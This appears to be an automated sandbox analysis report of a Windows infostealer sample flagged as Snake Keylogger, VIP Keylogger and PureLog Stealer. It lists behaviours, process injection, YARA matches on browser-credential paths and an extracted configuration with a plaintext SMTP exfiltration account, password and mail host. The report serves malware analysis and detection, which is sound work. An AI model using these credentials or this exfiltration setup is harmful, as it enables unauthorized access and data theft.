Edit tour

Windows Analysis Report
C5JLkBS1CX.exe

Overview

General Information

Sample name:	C5JLkBS1CX.exe renamed because original name is a hash value
Original sample name:	2caa04a44473cabb6298e6ce1c313beafb4a942641aed58ef247bb901f7ea314.exe
Analysis ID:	1588263
MD5:	65190ca2ca5f79e9f61cc56883158455
SHA1:	3c66b52af1d4ca0b06835198575737c82b0db864
SHA256:	2caa04a44473cabb6298e6ce1c313beafb4a942641aed58ef247bb901f7ea314
Tags:	exeRedLineStealeruser-adrian__luca
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

C5JLkBS1CX.exe (PID: 3568 cmdline: "C:\Users\user\Desktop\C5JLkBS1CX.exe" MD5: 65190CA2CA5F79E9F61CC56883158455)

RegSvcs.exe (PID: 3364 cmdline: "C:\Users\user\Desktop\C5JLkBS1CX.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

C5JLkBS1CX.exe (PID: 6084 cmdline: "C:\Users\user\Desktop\C5JLkBS1CX.exe" MD5: 65190CA2CA5F79E9F61CC56883158455)

RegSvcs.exe (PID: 1708 cmdline: "C:\Users\user\Desktop\C5JLkBS1CX.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "operations@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "operations@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4580969067.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 1B 88 44 24 2B 88 44 24 2F B0 1B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000000.00000002.2153263594.0000000000EF0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1B 88 44 24 2B 88 44 24 2F B0 1B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.2185993029.0000000003750000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1B 88 44 24 2B 88 44 24 2F B0 1B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e040:$a1: get_encryptedPassword 0x3e014:$a2: get_encryptedUsername 0x3e0d8:$a3: get_timePasswordChanged 0x3dff0:$a4: get_passwordField 0x3e056:$a5: set_encryptedPassword 0x3de23:$a7: get_logins 0x394a2:$a10: KeyLoggerEventArgs 0x39471:$a11: KeyLoggerEventArgsEventHandler 0x3def7:$a13: _encryptedPassword
00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x491b4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48857:$a3: \Google\Chrome\User Data\Default\Login Data 0x48ab4:$a4: \Orbitum\User Data\Default\Login Data 0x49493:$a5: \Kometa\User Data\Default\Login Data
00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3bc16:$s1: UnHook 0x3bbb2:$s2: SetHook 0x3bbeb:$s3: CallNextHook 0x3bb7a:$s4: _hook
00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ef28:$a1: get_encryptedPassword 0x3eefc:$a2: get_encryptedUsername 0x3efc0:$a3: get_timePasswordChanged 0x3eed8:$a4: get_passwordField 0x3ef3e:$a5: set_encryptedPassword 0x3ed0b:$a7: get_logins 0x3a38a:$a10: KeyLoggerEventArgs 0x3a359:$a11: KeyLoggerEventArgsEventHandler 0x3eddf:$a13: _encryptedPassword
00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a09c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4973f:$a3: \Google\Chrome\User Data\Default\Login Data 0x4999c:$a4: \Orbitum\User Data\Default\Login Data 0x4a37b:$a5: \Kometa\User Data\Default\Login Data
00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3cafe:$s1: UnHook 0x3ca9a:$s2: SetHook 0x3cad3:$s3: CallNextHook 0x3ca62:$s4: _hook
00000004.00000002.4583666104.0000000003F21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4583666104.0000000003F21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7f9a6:$a1: get_encryptedPassword 0x7f97a:$a2: get_encryptedUsername 0x7fa3e:$a3: get_timePasswordChanged 0x7f956:$a4: get_passwordField 0x7f9bc:$a5: set_encryptedPassword 0x7f789:$a7: get_logins 0x7ae08:$a10: KeyLoggerEventArgs 0x7add7:$a11: KeyLoggerEventArgsEventHandler 0x7f85d:$a13: _encryptedPassword
Process Memory Space: RegSvcs.exe PID: 1708	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 1708	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 1708	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 1708	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4acf0:$a1: get_encryptedPassword 0xae690:$a1: get_encryptedPassword 0x1a5bd1:$a1: get_encryptedPassword 0x4acc4:$a2: get_encryptedUsername 0xae664:$a2: get_encryptedUsername 0x1a5ba5:$a2: get_encryptedUsername 0x4ad88:$a3: get_timePasswordChanged 0xae728:$a3: get_timePasswordChanged 0x1a5c69:$a3: get_timePasswordChanged 0x4aca0:$a4: get_passwordField 0xae640:$a4: get_passwordField 0x1a5b81:$a4: get_passwordField 0x4ad06:$a5: set_encryptedPassword 0xae6a6:$a5: set_encryptedPassword 0x1a5be7:$a5: set_encryptedPassword 0x4aadc:$a7: get_logins 0xae47c:$a7: get_logins 0x1a59bd:$a7: get_logins 0x46f2b:$a10: KeyLoggerEventArgs 0xaa9e7:$a10: KeyLoggerEventArgs 0x1a1f28:$a10: KeyLoggerEventArgs
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1B 88 44 24 2B 88 44 24 2F B0 1B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.C5JLkBS1CX.exe.3750000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1B 88 44 24 2B 88 44 24 2F B0 1B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.C5JLkBS1CX.exe.ef0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1B 88 44 24 2B 88 44 24 2F B0 1B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
4.2.RegSvcs.exe.5200ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegSvcs.exe.5200ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.RegSvcs.exe.5200ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.RegSvcs.exe.5200ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.RegSvcs.exe.5200ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.RegSvcs.exe.5200ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e040:$a1: get_encryptedPassword 0x3e014:$a2: get_encryptedUsername 0x3e0d8:$a3: get_timePasswordChanged 0x3dff0:$a4: get_passwordField 0x3e056:$a5: set_encryptedPassword 0x3de23:$a7: get_logins 0x394a2:$a10: KeyLoggerEventArgs 0x39471:$a11: KeyLoggerEventArgsEventHandler 0x3def7:$a13: _encryptedPassword
4.2.RegSvcs.exe.5200ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x491b4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48857:$a3: \Google\Chrome\User Data\Default\Login Data 0x48ab4:$a4: \Orbitum\User Data\Default\Login Data 0x49493:$a5: \Kometa\User Data\Default\Login Data
4.2.RegSvcs.exe.5200ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3bc16:$s1: UnHook 0x3bbb2:$s2: SetHook 0x3bbeb:$s3: CallNextHook 0x3bb7a:$s4: _hook
4.2.RegSvcs.exe.2999a7e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegSvcs.exe.2999a7e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.RegSvcs.exe.2999a7e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.RegSvcs.exe.2999a7e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.RegSvcs.exe.2999a7e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.RegSvcs.exe.2999a7e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ef28:$a1: get_encryptedPassword 0x3eefc:$a2: get_encryptedUsername 0x3efc0:$a3: get_timePasswordChanged 0x3eed8:$a4: get_passwordField 0x3ef3e:$a5: set_encryptedPassword 0x3ed0b:$a7: get_logins 0x3a38a:$a10: KeyLoggerEventArgs 0x3a359:$a11: KeyLoggerEventArgsEventHandler 0x3eddf:$a13: _encryptedPassword
4.2.RegSvcs.exe.2999a7e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a09c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4973f:$a3: \Google\Chrome\User Data\Default\Login Data 0x4999c:$a4: \Orbitum\User Data\Default\Login Data 0x4a37b:$a5: \Kometa\User Data\Default\Login Data
4.2.RegSvcs.exe.2999a7e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3cafe:$s1: UnHook 0x3ca9a:$s2: SetHook 0x3cad3:$s3: CallNextHook 0x3ca62:$s4: _hook
4.2.RegSvcs.exe.5400000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 1B 88 44 24 2B 88 44 24 2F B0 1B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
4.2.RegSvcs.exe.5200000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegSvcs.exe.5200000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.RegSvcs.exe.5200000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.RegSvcs.exe.5200000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.RegSvcs.exe.5200000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.RegSvcs.exe.2999a7e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegSvcs.exe.2999a7e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.RegSvcs.exe.2999a7e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.RegSvcs.exe.2999a7e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.RegSvcs.exe.5400000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegSvcs.exe.5400000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.RegSvcs.exe.299a966.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegSvcs.exe.299a966.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.RegSvcs.exe.299a966.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.RegSvcs.exe.299a966.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.RegSvcs.exe.2999a7e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d128:$a1: get_encryptedPassword 0x3d0fc:$a2: get_encryptedUsername 0x3d1c0:$a3: get_timePasswordChanged 0x3d0d8:$a4: get_passwordField 0x3d13e:$a5: set_encryptedPassword 0x3cf0b:$a7: get_logins 0x3858a:$a10: KeyLoggerEventArgs 0x38559:$a11: KeyLoggerEventArgsEventHandler 0x3cfdf:$a13: _encryptedPassword
4.2.RegSvcs.exe.299a966.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegSvcs.exe.299a966.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.RegSvcs.exe.299a966.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.RegSvcs.exe.299a966.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.RegSvcs.exe.299a966.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.RegSvcs.exe.299a966.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e040:$a1: get_encryptedPassword 0x3e014:$a2: get_encryptedUsername 0x3e0d8:$a3: get_timePasswordChanged 0x3dff0:$a4: get_passwordField 0x3e056:$a5: set_encryptedPassword 0x3de23:$a7: get_logins 0x394a2:$a10: KeyLoggerEventArgs 0x39471:$a11: KeyLoggerEventArgsEventHandler 0x3def7:$a13: _encryptedPassword
4.2.RegSvcs.exe.299a966.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x491b4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48857:$a3: \Google\Chrome\User Data\Default\Login Data 0x48ab4:$a4: \Orbitum\User Data\Default\Login Data 0x49493:$a5: \Kometa\User Data\Default\Login Data
4.2.RegSvcs.exe.299a966.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c240:$a1: get_encryptedPassword 0x3c214:$a2: get_encryptedUsername 0x3c2d8:$a3: get_timePasswordChanged 0x3c1f0:$a4: get_passwordField 0x3c256:$a5: set_encryptedPassword 0x3c023:$a7: get_logins 0x376a2:$a10: KeyLoggerEventArgs 0x37671:$a11: KeyLoggerEventArgsEventHandler 0x3c0f7:$a13: _encryptedPassword
4.2.RegSvcs.exe.299a966.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x473b4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x46a57:$a3: \Google\Chrome\User Data\Default\Login Data 0x46cb4:$a4: \Orbitum\User Data\Default\Login Data 0x47693:$a5: \Kometa\User Data\Default\Login Data
4.2.RegSvcs.exe.299a966.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x39e16:$s1: UnHook 0x39db2:$s2: SetHook 0x39deb:$s3: CallNextHook 0x39d7a:$s4: _hook
4.2.RegSvcs.exe.5200000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ef28:$a1: get_encryptedPassword 0x3eefc:$a2: get_encryptedUsername 0x3efc0:$a3: get_timePasswordChanged 0x3eed8:$a4: get_passwordField 0x3ef3e:$a5: set_encryptedPassword 0x3ed0b:$a7: get_logins 0x3a38a:$a10: KeyLoggerEventArgs 0x3a359:$a11: KeyLoggerEventArgsEventHandler 0x3eddf:$a13: _encryptedPassword
4.2.RegSvcs.exe.5400000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.RegSvcs.exe.5400000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.RegSvcs.exe.5400000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
